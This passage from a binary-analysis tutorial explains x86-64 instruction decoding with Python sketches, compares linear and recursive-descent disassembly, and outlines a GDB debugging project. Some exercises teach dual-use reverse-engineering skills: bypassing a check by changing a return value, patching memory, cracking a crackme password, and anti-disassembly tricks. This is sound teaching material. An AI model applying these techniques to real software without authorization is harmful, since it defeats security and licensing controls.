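The two calls differ only in the Mod field and the operand direction implied by the opcode, which is the distinction between `mov eax, ebx` and `mov eax, [ebx]`.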

4. Displacement and Immediate Values

Many instructions have trailing bytes for offsets (displacements) or constants (immediates).

Guiding questions:

  • How do you know if an instruction has a displacement?
  • What’s the difference between an 8-bit and 32-bit immediate?
  • How are signed immediates handled?

Key reading: Intel SDM Volume 2A Section 2.1.4 (Displacement and Immediate Bytes)
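
Displacements and relative branch offsets are stored as two's-complement values, so a decoder has to sign-extend them. The sketch below shows that step and applies it to a `call rel32`; the helper names and the rel32 bytes in the demo are hypothetical (the sample listing above leaves them as `xx`).

```python
def sign_extend(value: int, bits: int) -> int:
    """Interpret the low `bits` bits of value as a two's-complement number."""
    sign_bit = 1 << (bits - 1)
    return (value & (sign_bit - 1)) - (value & sign_bit)

def call_target(insn_offset: int, insn: bytes) -> int:
    """Target of E8 rel32: offset of the next instruction plus the signed rel32."""
    if len(insn) != 5 or insn[0] != 0xE8:
        raise ValueError("expected a 5-byte call rel32")
    rel32 = sign_extend(int.from_bytes(insn[1:5], "little"), 32)
    return insn_offset + len(insn) + rel32

print(sign_extend(0xC0, 8))                              # disp8 from lea rax, [rbp-0x40]
print(hex(call_target(0x0F, bytes.fromhex("e8ecffffff"))))
```

`int.from_bytes(..., "little", signed=True)` would do the same job in one call; the explicit version is shown because it maps directly onto what a C implementation has to do.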

5. REX Prefix and 64-bit Mode

x86-64 added REX prefixes to access 64-bit registers (RAX, RBX, etc.) and extended registers (R8-R15).

Guiding questions:

  • How does the REX.W bit change instruction behavior?
  • What do REX.R, REX.X, REX.B extend?
  • Can you have multiple REX prefixes? (No!)

Key reading: “Low-Level Programming” Ch. 8 (x86-64 Architecture), Intel SDM Volume 2A Section 2.2.1 (REX Prefixes)
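
A sketch of REX handling, assuming the simplest case: a REX prefix, opcode 0x89 (MOV r/m64, r64), and a register-direct ModR/M byte. REX.R and REX.B each contribute a fourth bit to the 3-bit Reg and R/M fields, which is how R8-R15 become reachable. Function names are illustrative.

```python
REGS64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi",
          "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]

def decode_rex(byte: int):
    """Return the W/R/X/B bits if byte is a REX prefix (0x40-0x4F), else None."""
    if (byte & 0xF0) != 0x40:
        return None
    return {"W": (byte >> 3) & 1, "R": (byte >> 2) & 1, "X": (byte >> 1) & 1, "B": byte & 1}

def decode_mov_rr(code: bytes) -> str:
    """Decode REX.W + 0x89 + ModR/M with Mod=11 (nothing else is supported)."""
    rex = decode_rex(code[0])
    opcode, modrm = code[1], code[2]
    if rex is None or not rex["W"] or opcode != 0x89 or (modrm >> 6) != 0b11:
        raise ValueError("sketch only handles REX.W 89 /r in register form")
    reg = (rex["R"] << 3) | ((modrm >> 3) & 0b111)   # REX.R is bit 3 of Reg
    rm = (rex["B"] << 3) | (modrm & 0b111)           # REX.B is bit 3 of R/M
    return f"mov {REGS64[rm]}, {REGS64[reg]}"

for hexbytes in ("4889e5", "4989c0", "4c89c7"):
    print(hexbytes, "->", decode_mov_rr(bytes.fromhex(hexbytes)))
```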

6. Linear vs. Recursive Descent Disassembly

Two strategies: start at the beginning and decode sequentially (linear), or follow control flow (recursive descent).

Guiding questions:

  • What are the advantages of linear disassembly?
  • When does linear disassembly fail? (Hint: inline data)
  • Why is recursive descent more accurate but incomplete?

Key reading: “Practical Binary Analysis” Ch. 6.2 (Disassembly Algorithms)
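
The two strategies can be compared on a toy scale. The sketch below uses a made-up four-entry opcode table (real x86 lengths for `nop`, `ret`, `jmp rel8`, and `call rel32`, nothing else) and a five-byte buffer in which a junk `E8` byte sits right after a jump. All names here are illustrative.

```python
# Toy opcode table: opcode byte -> (mnemonic, total instruction length)
TOY_OPCODES = {0x90: ("nop", 1), 0xC3: ("ret", 1), 0xEB: ("jmp rel8", 2), 0xE8: ("call rel32", 5)}

def decode_at(code: bytes, off: int):
    name, length = TOY_OPCODES.get(code[off], ("(bad)", 1))
    if off + length > len(code):
        return "(truncated)", len(code) - off
    return name, length

def linear_sweep(code: bytes):
    """Decode every byte in order, trusting each instruction's length."""
    out, off = [], 0
    while off < len(code):
        name, length = decode_at(code, off)
        out.append((off, name))
        off += length
    return out

def recursive_descent(code: bytes, entry: int = 0):
    """Decode only bytes reachable by following control flow from entry."""
    out, seen, work = [], set(), [entry]
    while work:
        off = work.pop()
        while 0 <= off < len(code) and off not in seen:
            seen.add(off)
            name, length = decode_at(code, off)
            out.append((off, name))
            if name in ("ret", "(bad)", "(truncated)"):
                break                                   # this path ends here
            if name == "jmp rel8":
                rel = int.from_bytes(code[off + 1:off + 2], "little", signed=True)
                off += length + rel                     # unconditional: follow target only
                continue
            if name == "call rel32":
                rel = int.from_bytes(code[off + 1:off + 5], "little", signed=True)
                work.append(off + length + rel)         # queue callee, then fall through
            off += length
    return sorted(out)

code = bytes([0xEB, 0x01, 0xE8, 0x90, 0xC3])  # jmp +1; junk byte; nop; ret
print("linear:   ", linear_sweep(code))
print("recursive:", recursive_descent(code))
```

Linear sweep tries to decode the junk `E8` as a call and swallows the real `nop` and `ret`; recursive descent follows the jump and never looks at the junk byte. The flip side, not shown here, is that recursive descent cannot follow indirect jumps, so it can miss real code.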

7. Addressing Modes

x86 has incredibly complex addressing modes: [base + index*scale + displacement].

Guiding questions:

  • How is mov rax, [rbx + rcx*8 + 0x10] encoded?
  • Which addressing modes require a SIB byte?
  • What’s RIP-relative addressing? (x64 only)

Key reading: Intel SDM Volume 1 Section 3.7 (Operand Addressing), “Computer Systems: A Programmer’s Perspective” Ch. 3.5.1 (Operand Specifiers)
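
A sketch of SIB decoding for the `[base + index*scale + displacement]` form. It assumes no REX.X or REX.B extension and a non-negative displacement, and it does not handle the special case where Base=101 with Mod=00 means "no base register". The function names are illustrative.

```python
REGS64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]

def decode_sib(byte: int):
    """Return (scale, index, base); the 2-bit scale field encodes 1, 2, 4, or 8."""
    scale = 1 << ((byte >> 6) & 0b11)
    index = (byte >> 3) & 0b111
    base = byte & 0b111
    return scale, index, base

def format_sib_operand(sib: int, disp: int = 0) -> str:
    scale, index, base = decode_sib(sib)
    parts = [REGS64[base]]
    if index != 0b100:                  # index 100 means "no index register"
        parts.append(f"{REGS64[index]}*{scale}")
    if disp:
        parts.append(hex(disp))
    return "[" + " + ".join(parts) + "]"

# 48 8B 44 CB 10: REX.W, MOV r64, r/m64, ModR/M 0x44 (Mod=01, R/M=100), SIB 0xCB, disp8 0x10
print("mov rax,", format_sib_operand(0xCB, 0x10))
```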

8. Opcode Extensions and Group Encodings

Some opcodes are “groups” where the Reg field of ModR/M selects the actual instruction.

Guiding questions:

  • What is an opcode extension?
  • How do you decode 0xF7 /0 vs 0xF7 /4? (test vs mul)
  • Why does x86 use this complexity?

Key reading: Intel SDM Volume 2 Appendix A (Opcode Map), “Practical Binary Analysis” Ch. 6.2.2
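
For opcode 0xF7 the lookup is a second table indexed by the Reg field. The sketch below covers only that one group in 32-bit operand size and register-direct form; slot /1 is left empty because the Intel opcode map does not assign it. The names `GROUP_F7` and `decode_f7` are made up for this example.

```python
REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Opcode 0xF7: the ModR/M Reg field (/0 .. /7) selects the instruction.
GROUP_F7 = ["test", None, "not", "neg", "mul", "imul", "div", "idiv"]

def decode_f7(modrm: int) -> str:
    mod, reg, rm = (modrm >> 6) & 0b11, (modrm >> 3) & 0b111, modrm & 0b111
    mnemonic = GROUP_F7[reg]
    if mnemonic is None:
        return "(bad)"
    if mod != 0b11:
        raise NotImplementedError("memory operands are out of scope for this sketch")
    # Note: a real decoder must also consume the imm32 that follows F7 /0 (test).
    return f"{mnemonic} {REGS32[rm]}"

for modrm in (0xE1, 0xD8, 0xF1):
    print(f"f7 {modrm:02x} -> {decode_f7(modrm)}")
```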

Questions to Guide Your Design

  1. Will you build your own opcode tables or use a library? Capstone is comprehensive, but building tables teaches you deeply. Which path aligns with your goals?

  2. How will you handle invalid or undocumented opcodes? Should you show raw bytes, throw an error, or use heuristics?

  3. What output format will you produce? Intel syntax (mov eax, ebx) or AT&T syntax (movl %ebx, %eax)? Both have audiences.

  4. Will you support only one architecture (x86-64) or multiple? Supporting x86, x86-64, ARM, etc. requires modular design.

  5. How will you display operands? Show registers by name (RAX) or encoding (0x0)? Hex or decimal for immediates?

  6. What’s your strategy for multi-byte opcodes? x86 has 1-byte, 2-byte (0x0F), and 3-byte (0x0F 0x38/0x3A) opcodes.

  7. Will you implement linear or recursive descent? Or both as a comparative tool?

  8. How will you handle instruction prefixes? Prefixes modify opcodes: do you show them separately or integrate them into the instruction?

Thinking Exercise

Before coding, manually disassemble these byte sequences:

Exercise 1: Simple Instructions

Given bytes: 55 48 89 E5 48 83 EC 40

Using Intel SDM:

  1. 55 → Look up in opcode table → push rbp (or push ebp in 32-bit)
  2. 48 89 E5 → REX.W prefix, opcode 0x89, ModR/M 0xE5
    • REX.W → 64-bit operands
    • 0x89 → MOV r/m, r
    • ModR/M 0xE5 → Mod=11 (register), Reg=100 (ESP/RSP), R/M=101 (EBP/RBP)
    • Result: mov rbp, rsp
  3. Continue for remaining bytes

Write out each step. This cements the decode process.

Exercise 2: Memory Operands

Bytes: 48 8D 45 C0

Decode:

  1. 48 → REX.W (64-bit)
  2. 8D → LEA (Load Effective Address)
  3. 45 C0 → ModR/M + Displacement
    • ModR/M 0x45 → Mod=01 (8-bit disp), Reg=000 (RAX), R/M=101 (RBP)
    • Displacement: 0xC0 = -64 (signed byte)
  4. Result: lea rax, [rbp-0x40]

Exercise 3: SIB Byte Usage

Bytes: 48 89 8C CD 00 00 00 00

Decode manually:

  1. REX prefix?
  2. Opcode?
  3. ModR/M byte → triggers SIB?
  4. SIB byte → Scale, Index, Base?
  5. Displacement?

Expected: mov [rbp+rcx*8+0x0], rcx (the 32-bit displacement is present but zero)

Exercise 4: Compare Tools

echo -ne '\x55\x48\x89\xe5\x48\x83\xec\x40' > test.bin
objdump -D -b binary -m i386:x86-64 test.bin

Compare your manual work to objdump. Where do they differ? Why?

Also try:

ndisasm -b64 test.bin

Exercise 5: Misalignment Experiment

Take a known instruction sequence. Start disassembling from offset+1 instead of offset 0.

What happens? You get nonsense. This demonstrates why starting on a real instruction boundary matters and why “desynchronization” attacks work on linear disassemblers.

The Interview Questions They’ll Ask

  1. “What’s the difference between linear and recursive descent disassembly?”
    • Linear: Start at entry, decode every byte sequentially. Fast, but fooled by inline data or obfuscation. Recursive descent: Follow control flow (jumps, calls), disassemble only reachable code. Accurate, but misses indirect jumps.
  2. “How do you handle x86’s variable-length instructions?”
    • Parse byte-by-byte: decode prefixes, opcode, ModR/M, SIB, displacement, immediate. Each field’s presence depends on previous fields. Requires a state machine or careful offset tracking.
  3. “What’s the REX prefix and why is it necessary?”
    • REX extends x86-64 instructions. REX.W selects 64-bit operands. REX.R, REX.X, REX.B extend ModR/M Reg, SIB Index, and ModR/M R/M fields to access R8-R15 registers.
  4. “Explain ModR/M encoding with an example.”
    • ModR/M has 3 fields: Mod (2 bits), Reg (3 bits), R/M (3 bits). Example: mov eax, ebx (0x89 0xD8). 0x89 = MOV r/m, r. 0xD8 = Mod:11, Reg:011 (EBX), R/M:000 (EAX). Result: move EBX to EAX.
  5. “When is a SIB byte present?”
    • When ModR/M R/M field = 100 (binary) and Mod ≠ 11. SIB allows complex addressing: [base + index*scale + disp].
  6. “How do you disassemble encrypted or packed code?”
    • You can’t do it statically: encrypted bytes are meaningless until decrypted. Use dynamic analysis: run the code, let it decrypt itself, then dump and disassemble memory.
  7. “What are opcode extensions and why do they exist?”
    • Some opcodes (like 0xF7) use ModR/M Reg field to select the actual instruction. 0xF7 /0 = TEST, /4 = MUL, /6 = DIV. Saves opcode space.
  8. “How does x86 differ from ARM for disassembly?”
    • ARM has fixed 32-bit (or 16-bit Thumb) instructions, so finding instruction boundaries is easy (in ARM mode, every 4 bytes is an instruction). x86 is variable-length (1-15 bytes) with many prefix combinations, so disassembly is complex.
  9. “What’s the challenge with self-modifying code?”
    • Code that changes its own bytes at runtime. Your static disassembly is wrong after modification. Requires dynamic disassembly (disassemble from memory, not file).
  10. “Why would a malware author use opaque predicates or junk bytes?”
    • To break linear disassemblers. Insert jmp label; [garbage bytes]; label:. Linear disassemblers try to decode garbage. Recursive descent skips it.

Books That Will Help

Topic | Book | Chapter/Section
x86 Instruction Format | Intel 64/IA-32 Software Developer’s Manual Vol. 2A | Ch. 2: Instruction Format
Instruction Encoding | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch. 3.5: Arithmetic and Logical Operations (encoding examples)
Disassembly Algorithms | “Practical Binary Analysis” by Dennis Andriesse | Ch. 6.2: Static Disassembly (Linear vs Recursive Descent)
x86-64 Architecture | “Low-Level Programming” by Igor Zhirkov | Ch. 3: Assembly Language, Ch. 8: x86-64
ModR/M and SIB Bytes | Intel SDM Volume 2A | Section 2.1.3-2.1.5: ModR/M, SIB, and Displacement
REX Prefix | Intel SDM Volume 2A | Section 2.2.1: REX Prefixes
Opcode Map | Intel SDM Volume 2 | Appendix A: Opcode Map
Addressing Modes | “Computer Systems: A Programmer’s Perspective” | Ch. 3.5.1: Operand Specifiers
Assembly Syntax | “Low-Level Programming” | Ch. 3.2: Assembly Language Syntax
Disassembly Tools | “Practical Binary Analysis” | Ch. 5: Basic Binary Analysis in Linux
Instruction Reference | Intel SDM Volume 2B-2D | Instruction Set Reference (A-Z)
Anti-Disassembly | “Practical Malware Analysis” by Sikorski & Honig | Ch. 15: Anti-Disassembly
Obfuscation Techniques | “Practical Binary Analysis” | Ch. 6.2.5: Code Obfuscation
Building Disassemblers | “Engineering a Compiler” by Cooper & Torczon | Ch. 4: Intermediate Representations (related concepts)

ASCII Diagram: x86-64 Instruction Structure

Maximum instruction length: 15 bytes

+----------+-----+-----+--------+-------+-----+--------------+-----------+
| Prefixes | REX | Opc | ModR/M |  SIB  | Dsp |  Immediate   |  Total    |
+----------+-----+-----+--------+-------+-----+--------------+-----------+
| 0-4 bytes| 0-1 | 1-3 |  0-1   |  0-1  | 0-4 |    0-8       | 1-15 bytes|
+----------+-----+-----+--------+-------+-----+--------------+-----------+
| Optional | Opt | Req | Opt    | Opt   | Opt |   Optional   |           |
+----------+-----+-----+--------+-------+-----+--------------+-----------+

Prefixes (0-4 bytes):
  - Lock and Repeat: F0, F2, F3
  - Segment Override: 2E, 36, 3E, 26, 64, 65
  - Operand-size Override: 66
  - Address-size Override: 67

REX Prefix (x64 only, 0-1 byte):
  0100WRXB
    W = 1: 64-bit operand size
    R = extends ModR/M Reg field
    X = extends SIB Index field
    B = extends ModR/M R/M or SIB Base field

Opcode (1-3 bytes):
  - 1-byte: Most common (add, mov, push, pop, etc.)
  - 2-byte: 0x0F escape code + opcode (syscall, movss, etc.)
  - 3-byte: 0x0F 0x38/0x3A + opcode (SSSE3, SSE4; AVX selects these maps through a VEX prefix)

ModR/M (0-1 byte): Present for most instructions
  +----+----+----+
  |Mod |Reg |R/M |  (2 bits | 3 bits | 3 bits)
  +----+----+----+
  Mod: Addressing mode
    00 = [R/M]  (exception: R/M=101 means RIP + disp32 in 64-bit mode)
    01 = [R/M + disp8]
    10 = [R/M + disp32]
    11 = R/M (register direct)
  Reg: Register operand or opcode extension
  R/M: Register or memory operand

SIB (0-1 byte): Present when ModR/M R/M = 100 and Mod ≠ 11
  +-----+-----+------+
  |Scale|Index| Base |  (2 bits | 3 bits | 3 bits)
  +-----+-----+------+
  Encodes: [Base + Index*Scale + Displacement]
  Scale: 1, 2, 4, or 8

Displacement (0-4 bytes):
  - 0 bytes: None
  - 1 byte: disp8 (signed -128 to +127)
  - 4 bytes: disp32 (signed)

Immediate (0-8 bytes):
  - 1, 2, 4, or 8 bytes depending on instruction
  - Constants in mov, add, sub, cmp, etc.

Example Instruction Breakdown: mov rax, [rbp+rcx*8-0x40]

Bytes: 48 8B 44 CD C0

48        = REX.W (64-bit operands)
8B        = Opcode (MOV r64, r/m64)
44        = ModR/M (Mod=01, Reg=000 (RAX), R/M=100 (needs SIB))
CD        = SIB (Scale=11 (8), Index=001 (RCX), Base=101 (RBP))
C0        = Displacement (-0x40 as signed byte)

Decoding:
  - REX.W → 64-bit operation
  - Opcode 0x8B → MOV destination, source (r, r/m)
  - ModR/M: Mod=01 (disp8), Reg=000 (RAX), R/M=100 (SIB follows)
  - SIB: Scale=11 (×8), Index=001 (RCX), Base=101 (RBP)
  - Displacement: 0xC0 = -64 decimal

Result: mov rax, [rbp + rcx*8 - 0x40]
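The breakdown above can be checked mechanically. This is a minimal sketch that decodes only this one encoding shape (REX prefix, one-byte opcode, ModR/M with Mod=01, SIB, disp8) and ignores the REX R/X/B extension bits; the helper names are invented for illustration and do not come from any library.

```python
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]


def decode_rex(b):
    """Split a REX prefix (0100WRXB) into its four flag bits."""
    if b >> 4 != 0b0100:
        raise ValueError("not a REX prefix")
    return {"W": (b >> 3) & 1, "R": (b >> 2) & 1, "X": (b >> 1) & 1, "B": b & 1}


def decode_modrm(b):
    """Split ModR/M into Mod (2 bits), Reg (3 bits), R/M (3 bits)."""
    return {"mod": b >> 6, "reg": (b >> 3) & 7, "rm": b & 7}


def decode_sib(b):
    """Split SIB into scale factor (1, 2, 4, 8), index and base register numbers."""
    return {"scale": 1 << (b >> 6), "index": (b >> 3) & 7, "base": b & 7}


def disp8(b):
    """Interpret one byte as a signed 8-bit displacement."""
    return b - 0x100 if b & 0x80 else b


code = bytes.fromhex("488B44CDC0")
rex = decode_rex(code[0])
modrm = decode_modrm(code[2])
sib = decode_sib(code[3])
disp = disp8(code[4])

text = "mov {}, [{}+{}*{}{:+#x}]".format(
    REG64[modrm["reg"]], REG64[sib["base"]], REG64[sib["index"]], sib["scale"], disp
)
print(text)  # mov rax, [rbp+rcx*8-0x40]
```

A real decoder would also need the other Mod values, the no-SIB forms, and the REX register extensions; those are left out here on purpose.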

Key Insight: Decoding is deterministic from any given start offset, but the result depends on where you start. Starting from the wrong offset produces garbage. This is why malware uses “desynchronization” attacks: embedding never-executed bytes that look like the start of valid instructions to confuse linear disassemblers.
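To see desynchronization in action, here is a toy comparison of linear sweep and recursive descent. It is a sketch under heavy assumptions: the "instruction set" is only four real x86 opcodes with fixed lengths, calls are treated as plain fall-through, and the byte sequence is a hand-made example where a jmp hops over a junk 0xE8 byte.

```python
# Toy instruction table: opcode -> (mnemonic, total length in bytes).
TOY_OPCODES = {
    0xEB: ("jmp rel8", 2),
    0xE8: ("call rel32", 5),
    0x90: ("nop", 1),
    0xC3: ("ret", 1),
}


def linear_sweep(code):
    """Decode byte after byte from offset 0, trusting every instruction length."""
    out, off = [], 0
    while off < len(code):
        name, length = TOY_OPCODES.get(code[off], ("db", 1))
        out.append((off, name))
        off += length
    return out


def recursive_descent(code, entry=0):
    """Decode only offsets reachable by following control flow from the entry point."""
    out, seen, work = [], set(), [entry]
    while work:
        off = work.pop()
        while 0 <= off < len(code) and off not in seen:
            seen.add(off)
            op = code[off]
            name, length = TOY_OPCODES.get(op, ("db", 1))
            out.append((off, name))
            if op == 0xEB:  # unconditional jump: continue at the target only
                rel = code[off + 1]
                rel = rel - 0x100 if rel & 0x80 else rel
                work.append(off + length + rel)
                break
            if op == 0xC3:  # ret ends this path
                break
            off += length
    return sorted(out)


# jmp +1; junk byte E8; nop; nop; nop; nop; ret
code = bytes.fromhex("EB01E890909090C3")
print(linear_sweep(code))       # [(0, 'jmp rel8'), (2, 'call rel32'), (7, 'ret')]
print(recursive_descent(code))  # jmp, then four nops at 3..6, then ret at 7
```

The linear sweep swallows the four nop bytes as the operand of a call that never executes, while recursive descent recovers the real instruction stream.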

Project 4: GDB Debugging Deep Dive

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (for targets), GDB commands
  • Alternative Programming Languages: Python (GDB scripting)
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Debugging / Dynamic Analysis
  • Software or Tool: GDB, pwndbg/GEF, GCC
  • Main Book: “The Art of Debugging with GDB” by Matloff & Salzman

What you’ll build: A series of increasingly complex debugging exercises, culminating in a GDB Python extension for automated analysis.

Why it teaches binary analysis: Debugging is the most direct way to understand program behavior. GDB is the standard open-source debugger on Linux, and it is scriptable.

Core challenges you’ll face:

  • Setting breakpoints → maps to controlling execution
  • Examining memory → maps to understanding data layout
  • Stepping through code → maps to following control flow
  • Scripting with Python → maps to automating analysis

Resources for key challenges:

Key Concepts:

  • Breakpoints and Watchpoints: GDB documentation
  • Memory Examination: “The Art of Debugging” Ch. 3
  • Python GDB API: GDB Python documentation

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Basic C, assembly basics

Real world outcome:

$ gdb ./target_binary
(gdb) break main
(gdb) run
(gdb) disassemble
(gdb) info registers
(gdb) x/20x $rsp           # Examine stack
(gdb) x/s 0x402000         # Examine string
(gdb) set $rax = 0x1337    # Modify register
(gdb) python
>gdb.execute("info registers")
>frame = gdb.selected_frame()
>print(frame.read_register("rip"))
>end
(gdb) continue

Implementation Hints:

Essential GDB commands to master:

# Execution control
run [args]           # Start program
continue (c)         # Continue execution
stepi (si)           # Step one instruction
nexti (ni)           # Step over calls
finish               # Run until function returns

# Breakpoints
break *0x401000      # Break at address
break main           # Break at function
watch *0x7ffd1234    # Break on memory write
catch syscall write  # Break on syscall

# Examination
disassemble main     # Show assembly
info registers       # All registers
x/10i $rip           # 10 instructions at RIP
x/20wx $rsp          # 20 words at stack
x/s 0x402000         # String at address
info proc mappings   # Memory layout

# Modification
set $rax = 0         # Change register
set *(int*)0x401000 = 0x90909090  # Patch memory

Create exercises:

  1. Find a hidden password in a crackme
  2. Trace a function’s execution
  3. Modify a return value to bypass a check
  4. Write a GDB script to log all function calls

Learning milestones:

  1. Basic debugging → Set breakpoints, step, examine
  2. Memory analysis → Understand stack and heap layout
  3. Modify execution → Change registers and memory
  4. Python scripting → Automate repetitive tasks

The Core Question You’re Answering

How do you observe and manipulate a running program’s state without modifying its source code, and why is interactive debugging more powerful than static analysis for understanding complex behavior?

Debugging bridges the gap between theory and reality. Static analysis shows what code could do. Dynamic analysis with GDB shows what it actually does, with real data, real timing, and real state.

Concepts You Must Understand First

1. Process Memory Layout and Address Space

When you debug a program, you’re inspecting its virtual memory: code, data, heap, stack, and libraries.

Guiding questions:

  • What’s the difference between the stack and the heap?
  • Why do local variables live at high addresses and code at low addresses?
  • How does GDB access another process’s memory?

Key reading: “Computer Systems: A Programmer’s Perspective” Ch. 9 (Virtual Memory), “Hacking: The Art of Exploitation” Ch. 2 (Programming - Memory Segments)
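On Linux, the layout that info proc mappings prints comes from /proc/<pid>/maps. The sketch below parses lines in that format; the three sample lines (addresses, inode, and the /tmp/target path) are invented for illustration, and parse_maps_line is a hypothetical helper, not part of GDB.

```python
from typing import NamedTuple


class Mapping(NamedTuple):
    start: int
    end: int
    perms: str
    path: str


def parse_maps_line(line):
    """Parse one line of /proc/<pid>/maps: 'start-end perms offset dev inode [path]'."""
    fields = line.split(None, 5)
    start, end = (int(x, 16) for x in fields[0].split("-"))
    path = fields[5].strip() if len(fields) > 5 else ""
    return Mapping(start, end, fields[1], path)


# Hypothetical sample; a real process has many more mappings.
SAMPLE = """\
00400000-00401000 r-xp 00000000 08:01 131 /tmp/target
01c3e000-01c5f000 rw-p 00000000 00:00 0 [heap]
7ffd1a2b3000-7ffd1a2d4000 rw-p 00000000 00:00 0 [stack]
"""

maps = [parse_maps_line(line) for line in SAMPLE.splitlines()]
for m in maps:
    print(f"{m.start:#014x}-{m.end:#014x} {m.perms} {m.path}")
```

Sorting real mappings by start address makes the guiding question visible: code near the bottom, heap above it, stack near the top of the user address space.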

2. Breakpoints: Software vs. Hardware

Software breakpoints replace instruction bytes with int3 (0xCC on x86). Hardware breakpoints use CPU debug registers.

Guiding questions:

  • How does GDB set a software breakpoint without permanently modifying the binary?
  • What are the limits on hardware breakpoints? (Typically 4 on x86)
  • When would you use a hardware breakpoint instead of software?

Key reading: “The Art of Debugging with GDB, DDD, and Eclipse” Ch. 2 (Breakpoints), Intel SDM Volume 3 Ch. 17 (Debug Registers)

3. The Call Stack and Stack Frames

The stack grows with each function call. Each frame contains local variables, saved registers, and the return address.

Guiding questions:

  • How does GDB’s backtrace command work?
  • What’s stored in the base pointer (RBP) and stack pointer (RSP)?
  • How can you inspect a caller’s variables from a deeper function?

Key reading: “Computer Systems: A Programmer’s Perspective” Ch. 3.7 (Procedures), “Hacking: The Art of Exploitation” Ch. 3 (Exploitation - Stack Overflows)
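One way to build intuition for backtrace is to walk the saved-RBP chain by hand. The sketch below does that over a fake memory dictionary; it assumes the code was compiled with frame pointers (each frame stores the caller’s RBP at [rbp] and the return address at [rbp+8]). Real GDB normally relies on DWARF unwind information instead, and every address here is made up.

```python
def walk_frames(memory, rbp, rip, max_depth=16):
    """Return code addresses from innermost frame outward by following saved RBP links.

    memory maps an address to the 8-byte value stored there.
    """
    trace = [rip]
    while rbp != 0 and len(trace) < max_depth:
        ret = memory.get(rbp + 8)  # return address sits just above the saved RBP
        if ret is None:
            break
        trace.append(ret)
        rbp = memory.get(rbp, 0)   # saved RBP points at the caller's frame
    return trace


# Hypothetical stack snapshot while stopped inside add(), called as main -> calculate -> add.
memory = {
    0x7FFE0010: 0x7FFE0030, 0x7FFE0018: 0x401150,  # add's frame: saved RBP, return into calculate
    0x7FFE0030: 0x7FFE0050, 0x7FFE0038: 0x401170,  # calculate's frame: return into main
    0x7FFE0050: 0x0,        0x7FFE0058: 0x401200,  # main's frame: return into startup code
}

trace = walk_frames(memory, rbp=0x7FFE0010, rip=0x401130)
print([hex(a) for a in trace])
```

In GDB you can reproduce the same walk manually with x/2gx $rbp and then repeating it on the first value printed.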

4. Symbols and Debug Information (DWARF)

Stripped binaries have no function names. Binaries compiled with -g contain DWARF debug info mapping addresses to source lines.

Guiding questions:

  • What’s the difference between a stripped and non-stripped binary?
  • How does GDB find variable names and types?
  • Can you debug a stripped binary? What do you lose?

Key reading: “Practical Binary Analysis” Ch. 5.3 (Symbols and Stripped Binaries), DWARF Debugging Standard documentation

5. Watchpoints: Breaking on Data, Not Code

Watchpoints trigger when memory is read, written, or changes value. Crucial for finding “who modified this variable?”

Guiding questions:

  • How are watchpoints implemented? (Hint: hardware debug registers)
  • What’s the performance cost of watchpoints?
  • Can you watch a range of addresses or only individual locations?

Key reading: “The Art of Debugging with GDB” Ch. 3 (Watchpoints and Catchpoints), GDB Documentation (Watchpoints section)

6. GDB’s Python API and Automation

GDB embeds Python for scripting. You can automate tasks, write custom commands, and analyze program state programmatically.

Guiding questions:

  • How do you access registers from Python in GDB?
  • Can you set breakpoints from a Python script?
  • How would you log every function call automatically?

Key reading: GDB Python API documentation, “The Art of Debugging with GDB” Ch. 8 (Scripting)

7. Debugging Multi-Threaded Programs

Threads share memory but have separate stacks and registers. Debugging threads requires understanding concurrency.

Guiding questions:

  • How do you switch between threads in GDB?
  • What happens when one thread hits a breakpoint: do the others stop?
  • How do you debug race conditions?

Key reading: “Computer Systems: A Programmer’s Perspective” Ch. 12 (Concurrent Programming), “The Art of Debugging with GDB” Ch. 6 (Debugging Multi-threaded Programs)

8. Remote Debugging and Embedded Systems

GDB can debug programs on remote systems or embedded devices using the GDB Remote Serial Protocol.

Guiding questions:

  • How does gdbserver communicate with GDB?
  • Can you debug a program on a different architecture?
  • What’s the difference between native and remote debugging?

Key reading: GDB Documentation (Remote Debugging), “Embedded Systems Architecture” by Tammy Noergaard (GDB sections)
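To get a feel for what gdbserver and GDB exchange, here is a minimal sketch of the packet framing used by the GDB Remote Serial Protocol: $ + payload + # + a two-digit hex checksum (the sum of the payload bytes modulo 256). It deliberately ignores acknowledgements, escaping of special characters, and run-length encoding; the function names are invented for this example.

```python
def rsp_checksum(payload: str) -> int:
    """Checksum used by the remote protocol: sum of payload bytes modulo 256."""
    return sum(payload.encode("ascii")) % 256


def rsp_frame(payload: str) -> str:
    """Wrap a payload as $<payload>#<two hex digits>."""
    return "${}#{:02x}".format(payload, rsp_checksum(payload))


def rsp_parse(packet: str) -> str:
    """Validate the framing and checksum, then return the payload."""
    if len(packet) < 4 or packet[0] != "$" or packet[-3] != "#":
        raise ValueError("malformed packet")
    payload, received = packet[1:-3], int(packet[-2:], 16)
    if rsp_checksum(payload) != received:
        raise ValueError("bad checksum")
    return payload


print(rsp_frame("g"))  # 'g' asks the stub for the register values
print(rsp_frame("?"))  # '?' asks why the target halted
```

Running set debug remote 1 in GDB prints the real packets, which is a good way to compare against this sketch.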

Questions to Guide Your Design

  1. What exercises will teach you the most? Simple “hello world” debugging is boring. What about reversing a password checker? Analyzing a buffer overflow? Tracing a complex data structure?

  2. How will you structure your learning progression? Start with basic commands, then breakpoints, then memory examination, then modification, then Python scripting?

  3. Will you use GDB plugins (pwndbg, GEF, peda)? These add powerful features for exploit development. When should you learn vanilla GDB vs. enhanced versions?

  4. What real-world scenarios will you practice? Debugging a segfault? Finding a memory leak? Analyzing a crackme? Reverse engineering a proprietary binary?

  5. How will you document your GDB knowledge? Build a cheat sheet? Create a reference of common commands? Write GDB scripts you can reuse?

  6. Will you learn GDB’s TUI mode? The Text User Interface shows code, registers, and assembly simultaneously. It’s powerful but has a learning curve.

  7. What target binaries will you debug? Toy programs you write, existing open-source software, CTF challenges, or malware samples?

  8. How will you practice without source code? Debugging stripped binaries is a critical skill for reverse engineering.

Thinking Exercise

Before writing Python scripts, master these manual exercises:

